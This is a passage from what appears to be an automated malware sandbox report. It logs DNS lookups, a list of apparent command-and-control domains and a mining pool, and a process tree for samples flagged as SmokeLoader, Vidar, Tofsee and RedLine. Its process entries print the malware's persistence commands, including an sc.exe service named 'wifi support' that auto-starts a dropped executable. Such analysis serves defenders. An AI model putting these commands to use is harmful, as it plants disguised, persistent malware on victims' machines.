                                                                                                                                                                                                        Jan 14, 2022 00:16:23.226542950 CET8.8.8.8192.168.2.40x8de8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.226542950 CET8.8.8.8192.168.2.40x8de8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.253052950 CET8.8.8.8192.168.2.40x3019No error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:23.767479897 CET8.8.8.8192.168.2.40xa426No error (0)a0621298.xsph.ru141.8.194.74A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.850064993 CET8.8.8.8192.168.2.40x8a9No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.850064993 CET8.8.8.8192.168.2.40x8a9No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.850064993 CET8.8.8.8192.168.2.40x8a9No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.850064993 CET8.8.8.8192.168.2.40x8a9No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:31.850064993 CET8.8.8.8192.168.2.40x8a9No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.406083107 CET8.8.8.8192.168.2.40x22eNo error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.406083107 CET8.8.8.8192.168.2.40x22eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.406083107 CET8.8.8.8192.168.2.40x22eNo error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.406083107 CET8.8.8.8192.168.2.40x22eNo error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:33.406083107 CET8.8.8.8192.168.2.40x22eNo error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.757019043 CET8.8.8.8192.168.2.40xdb81No error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.757019043 CET8.8.8.8192.168.2.40xdb81No error (0)pool-fr.supportxmr.com91.121.140.167A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.757019043 CET8.8.8.8192.168.2.40xdb81No error (0)pool-fr.supportxmr.com149.202.83.171A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.757019043 CET8.8.8.8192.168.2.40xdb81No error (0)pool-fr.supportxmr.com37.187.95.110A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.757019043 CET8.8.8.8192.168.2.40xdb81No error (0)pool-fr.supportxmr.com94.23.23.52A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:16:51.757019043 CET8.8.8.8192.168.2.40xdb81No error (0)pool-fr.supportxmr.com94.23.247.226A (IP address)IN (0x0001)
                                                                                                                                                                                                        Jan 14, 2022 00:17:13.884191990 CET8.8.8.8192.168.2.40x5e1No error (0)patmushta.info8.209.67.104A (IP address)IN (0x0001)

                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                        • lkoyuevdx.net
                                                                                                                                                                                                          • host-data-coin-11.com
                                                                                                                                                                                                        • secxfi.net
                                                                                                                                                                                                        • vuafh.org
                                                                                                                                                                                                        • psxblf.com
                                                                                                                                                                                                        • dsdofcnp.com
                                                                                                                                                                                                        • obbsps.com
                                                                                                                                                                                                        • ttkljrkl.com
                                                                                                                                                                                                        • fvjjmgnhpi.org
                                                                                                                                                                                                        • data-host-coin-8.com
                                                                                                                                                                                                        • giblvuodn.org
                                                                                                                                                                                                        • unjilfapdr.net
                                                                                                                                                                                                        • bnrfjahkht.net
                                                                                                                                                                                                        • epntadtm.net
                                                                                                                                                                                                        • privacy-tools-for-you-780.com
                                                                                                                                                                                                        • yevvbkvx.org
                                                                                                                                                                                                        • psfbiu.com
                                                                                                                                                                                                        • unicupload.top
                                                                                                                                                                                                        • phnfrhmjav.com
                                                                                                                                                                                                        • etxdniy.com
                                                                                                                                                                                                        • tlotvuqfn.net
                                                                                                                                                                                                        • bjfnimnu.org
                                                                                                                                                                                                        • mkbyakqqj.com
                                                                                                                                                                                                        • reeitd.net
                                                                                                                                                                                                        • vnmaltjgi.net
                                                                                                                                                                                                        • fmegeducg.org
                                                                                                                                                                                                        • 185.7.214.171:8080
                                                                                                                                                                                                        • ghiodndfpo.com
                                                                                                                                                                                                        • njpun.net
                                                                                                                                                                                                        • rmhfrtkprf.net
                                                                                                                                                                                                        • ynkqvnpya.com
                                                                                                                                                                                                        • pnfnlpnysf.com
                                                                                                                                                                                                        • mosjbuj.net
                                                                                                                                                                                                        • oytdv.net
                                                                                                                                                                                                        • rljjkyrr.net
                                                                                                                                                                                                        • jpqcmep.com
                                                                                                                                                                                                        • fosbja.com
                                                                                                                                                                                                        • rcjgja.net
                                                                                                                                                                                                        • yivbbwxtct.com
                                                                                                                                                                                                        • dqwogmqhb.com
                                                                                                                                                                                                        • cvhsbw.com
                                                                                                                                                                                                        • oyghbp.com
                                                                                                                                                                                                        • yuvwrs.com
                                                                                                                                                                                                        • xkujdf.net
                                                                                                                                                                                                        • fyyanes.com
                                                                                                                                                                                                        • tyjpjf.org
                                                                                                                                                                                                        • rsxrkuta.org
                                                                                                                                                                                                        • jlgqjcjkdy.net
                                                                                                                                                                                                        • avcxisfo.org
                                                                                                                                                                                                        • mvsed.org
                                                                                                                                                                                                        • pgctyuwy.net
                                                                                                                                                                                                        • surulybuu.org
                                                                                                                                                                                                        • thylpwqt.org
                                                                                                                                                                                                        • rhglrb.org
                                                                                                                                                                                                        • dbxsgfe.org
                                                                                                                                                                                                        • a0621298.xsph.ru
                                                                                                                                                                                                        • aoavvcteey.com
                                                                                                                                                                                                        • tqnyuoui.net
                                                                                                                                                                                                        • nqlstnrw.org
                                                                                                                                                                                                        • cbwqss.org
                                                                                                                                                                                                        • toosx.com
                                                                                                                                                                                                        • dokqsat.net
                                                                                                                                                                                                        • pipoxpya.com
                                                                                                                                                                                                        • wbrirc.com
                                                                                                                                                                                                        • 185.215.113.35
                                                                                                                                                                                                        • dwskrgjp.com
                                                                                                                                                                                                        • pwahu.net
                                                                                                                                                                                                        • xnfmckfat.org
                                                                                                                                                                                                        • 185.163.204.22
                                                                                                                                                                                                        • htagjvn.org
                                                                                                                                                                                                        • 185.163.204.24
                                                                                                                                                                                                        • nadbxcytci.net
                                                                                                                                                                                                        • wvnyptv.com

                                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                        Analysis Process: U3E7zMaux2.exe PID: 6688 Parent PID: 3512

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:26
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\U3E7zMaux2.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\U3E7zMaux2.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: U3E7zMaux2.exe PID: 6728 Parent PID: 6688

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:28
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\Desktop\U3E7zMaux2.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\U3E7zMaux2.exe"
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.713149753.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.713456716.0000000002301000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 6728

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:35
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                        Imagebase:0x7ff6fee60000
                                                                                                                                                                                                        File size:3933184 bytes
                                                                                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000000.700489251.00000000044E1000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 2480 Parent PID: 568

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:36
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 6140 Parent PID: 568

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:14:56
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: uufaeea PID: 2804 Parent PID: 968

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:09
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: uufaeea PID: 6944 Parent PID: 2804

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:12
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\uufaeea
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.766896131.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000C.00000002.766831607.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 5444 Parent PID: 568

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:12
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: D984.exe PID: 5756 Parent PID: 3424

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:12
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\D984.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\D984.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:301056 bytes
                                                                                                                                                                                                        MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 5680 Parent PID: 568

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:15
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: WerFault.exe PID: 5788 Parent PID: 5680

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:16
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5756 -ip 5756
                                                                                                                                                                                                        Imagebase:0x1240000
                                                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: E666.exe PID: 4780 Parent PID: 3424

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:16
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: WerFault.exe PID: 6712 Parent PID: 5756

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:19
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 520
                                                                                                                                                                                                        Imagebase:0x1240000
                                                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Analysis Process: E666.exe PID: 4388 Parent PID: 4780

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:20
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\E666.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:294400 bytes
                                                                                                                                                                                                        MD5 hash:8362E0F91AE3379C73422BBCA7BAC493
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.784101177.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000013.00000002.783879616.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: 7CA1.exe PID: 5352 Parent PID: 3424

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:21
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\7CA1.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\7CA1.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:327680 bytes
                                                                                                                                                                                                        MD5 hash:3754DB9964B0177B6E905999B6F18FD7
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.775878501.0000000000622000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        Analysis Process: 86C4.exe PID: 1368 Parent PID: 3424

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:23
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\86C4.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\86C4.exe
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:313344 bytes
                                                                                                                                                                                                        MD5 hash:B11C5DEFDBA76C2B3EE67EE1B474389D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000002.797378726.0000000000540000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000003.780018628.0000000000560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                        Analysis Process: 8EC4.exe PID: 6024 Parent PID: 3424

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:25
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\8EC4.exe
                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                        File size:537088 bytes
                                                                                                                                                                                                        MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000016.00000002.828481056.0000000004401000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                        Analysis Process: cmd.exe PID: 5208 Parent PID: 1368

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:28
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\shayesoq\
                                                                                                                                                                                                        Imagebase:0x11d0000
                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6000 Parent PID: 5208

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:28
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: cmd.exe PID: 6392 Parent PID: 1368

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:29
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lagavljy.exe" C:\Windows\SysWOW64\shayesoq\
                                                                                                                                                                                                        Imagebase:0x11d0000
                                                                                                                                                                                                        File size:232960 bytes
                                                                                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 6916 Parent PID: 6392

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:29
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: sc.exe PID: 3496 Parent PID: 1368

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:30
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                                                                        Imagebase:0x150000
                                                                                                                                                                                                        File size:60928 bytes
                                                                                                                                                                                                        MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: svchost.exe PID: 4936 Parent PID: 568

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:30
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                        Imagebase:0x7ff6eb840000
                                                                                                                                                                                                        File size:51288 bytes
                                                                                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                                                                                        Analysis Process: conhost.exe PID: 1496 Parent PID: 3496

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:00:15:30
                                                                                                                                                                                                        Start date:14/01/2022
                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        Imagebase:0x7ff724c50000
                                                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language

